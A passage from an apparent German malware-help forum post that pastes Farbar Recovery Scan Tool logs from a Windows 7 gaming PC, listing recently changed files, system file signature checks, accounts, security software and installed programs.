2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-11 20:53 - 2017-06-20 06:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-09 18:39 - 2017-07-09 18:55 - 000000000 ____D C:\Users\****\Documents\SimCity
2017-07-09 18:26 - 2017-07-09 18:59 - 000001008 _____ C:\Users\Public\Desktop\SimCity™.lnk
2017-07-09 18:26 - 2017-07-09 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-07-05 21:32 - 2017-07-05 21:32 - 000000000 ____D C:\Users\****\AppData\Local\Hinterland
2017-07-05 21:27 - 2017-07-05 21:27 - 000000000 ____D C:\Users\****\AppData\LocalLow\Hinterland
2017-07-05 20:01 - 2017-07-05 20:01 - 000000222 _____ C:\Users\****\Desktop\The Long Dark.url

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-01 14:52 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Local\Spotify
2017-08-01 14:29 - 2017-04-19 20:10 - 000000000 ____D C:\Users\****
2017-08-01 14:28 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Roaming\Spotify
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\****\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\****\Dropbox
2017-08-01 12:38 - 2017-04-19 20:20 - 003628176 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-01 12:38 - 2017-03-20 06:35 - 001756776 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-01 12:38 - 2017-03-20 06:35 - 000437274 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-01 12:34 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-01 12:32 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-01 12:32 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-01 12:32 - 2015-03-15 23:24 - 000000000 ____D C:\ProgramData\ProductData
2017-08-01 12:31 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-01 12:29 - 2017-05-17 19:05 - 000000000 ____D C:\Users\****\AppData\Local\b95cd
2017-08-01 12:22 - 2015-03-01 21:28 - 000000000 ____D C:\Users\****\AppData\Roaming\Skype
2017-08-01 12:04 - 2016-10-27 18:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 4
2017-08-01 12:02 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-01 03:53 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-01 03:51 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-01 03:16 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:11 - 2016-01-03 14:51 - 000000000 ____D C:\Users\****\AppData\Local\CrashDumps
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\****\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\****\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\****\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\****\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-31 19:59 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-07-31 19:59 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-07-31 19:59 - 2015-02-06 18:49 - 000000000 ____D C:\Users\****\AppData\Local\Packages
2017-07-31 19:41 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-31 19:26 - 2017-06-06 17:27 - 000002212 _____ C:\Users\Public\Desktop\Advanced SystemCare 10.lnk
2017-07-31 19:23 - 2015-03-09 00:28 - 000000000 ____D C:\Users\****\AppData\Local\Ubisoft Game Launcher
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-28 13:12 - 2015-12-12 16:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2017-07-27 01:16 - 2015-02-06 19:58 - 000000000 ____D C:\Users\****\AppData\Local\Battle.net
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Local\Discord
2017-07-26 20:23 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-25 13:54 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-07-25 13:53 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-07-25 13:53 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-07-24 19:38 - 2015-02-06 20:39 - 000000000 ____D C:\Users\****\AppData\Local\Turbine
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-14 19:07 - 2015-02-07 15:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Dropbox
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 19:39 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-07-12 19:33 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-11 21:53 - 2017-04-26 02:29 - 000003778 _____ C:\WINDOWS\System32\Tasks\AviraSystemSpeedupUpdate
2017-07-11 21:53 - 2015-12-12 16:06 - 000000000 ____D C:\Program Files (x86)\Avira
2017-07-11 20:56 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-11 20:54 - 2015-02-06 20:57 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-07 22:12 - 2017-03-31 20:13 - 000000000 ____D C:\Users\****\AppData\Local\Warframe

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\****\AppData\Local\recently-used.xbel
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-11-02 23:41 - 2015-11-02 23:41 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-01 03:15

==================== Ende von FRST.txt ============================

Lost_Viking · 01.08.2017, 14:50

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 31-07-2017
durchgeführt von ***** (01-08-2017 15:04:28)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {B3F630BD-538D-1B4A-14FA-14B63235278F}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {0897D159-75B7-14C4-2E4A-2FC449B26D32}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

3DMark (HKLM\...\{4EC1B8B7-E3B4-4A9F-8005-7AF92DA4DFCF}) (Version: 1.4.828.0 - Futuremark) Hidden
3DMark (HKLM-x32\...\{7330098c-3669-4f39-9e82-4221d489db39}) (Version: 1.4.828.0 - Futuremark)
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20058 - Adobe Systems Incorporated)
Advanced SystemCare 10 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 10.4.0 - IObit)
Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Akamai) (Version:  - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.28.28 - Avira Operations GmbH & Co. KG)
Avira Connect (HKLM-x32\...\{661C79C2-D156-419C-81CA-D1A2523B0841}) (Version: 1.2.91.10326 - Avira Operations GmbH & Co. KG) Hidden
Avira Connect (HKLM-x32\...\{dd9049b8-31d1-40bd-8c8c-97a7b087a78f}) (Version: 1.2.91.10326 - Avira Operations GmbH & Co. KG)
Avira Phantom VPN (HKLM-x32\...\Avira Phantom VPN) (Version: 2.9.1.24376 - Avira Operations GmbH & Co. KG)
Avira Software Updater (HKLM-x32\...\{8BCF08B0-0A9D-49C5-8187-38C72FD43336}) (Version: 2.0.3.29917 - Avira Operations GmbH & Co. KG)
Avira System Speedup (HKLM-x32\...\Avira System Speedup_is1) (Version: 3.7.1.5481 - Avira Operations GmbH & Co. KG)
Batman: Arkham City GOTY (HKLM\...\Steam App 200260) (Version:  - Rocksteady Studios)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Command & Conquer™ Red Alert 2 and Yuri’s Revenge (HKLM-x32\...\{F5275D1C-D133-486D-8F07-D6C571F0A8EC}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Deus Ex: Mankind Divided™ (HKLM\...\Steam App 337000) (Version:  - Eidos Montreal)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Driver Booster 4.4 (HKLM-x32\...\Driver Booster_is1) (Version: 4.4.0 - IObit)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 30.4.22 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dropbox) (Version: 30.4.22 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Dying Light (HKLM\...\Steam App 239140) (Version:  - Techland)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version:  - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version:  - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version:  - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version:  - Bethesda Game Studios)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Free YouTube Download (HKLM-x32\...\Free YouTube Download_is1) (Version: 4.1.44.427 - Digital Wave Ltd)
Futuremark SystemInfo (HKLM-x32\...\{A7E0E8D0-2E06-428A-8A8A-83BFF0B4DFE6}) (Version: 4.34.498.0 - Futuremark)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version:  - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.78 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Jade Empire (HKLM-x32\...\{EEAA7AC3-F651-4842-86E0-4C755181388B}) (Version: 1.0.1.2 - Electronic Arts)
Java 8 Update 141 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180141F0}) (Version: 8.0.1410.15 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version:  - NGD Studios)
Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version:  - 4A Games)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version:  - Rogue Factor)
Mozilla Firefox 54.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 54.0.1 (x86 de)) (Version: 54.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0.1 - Mozilla)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
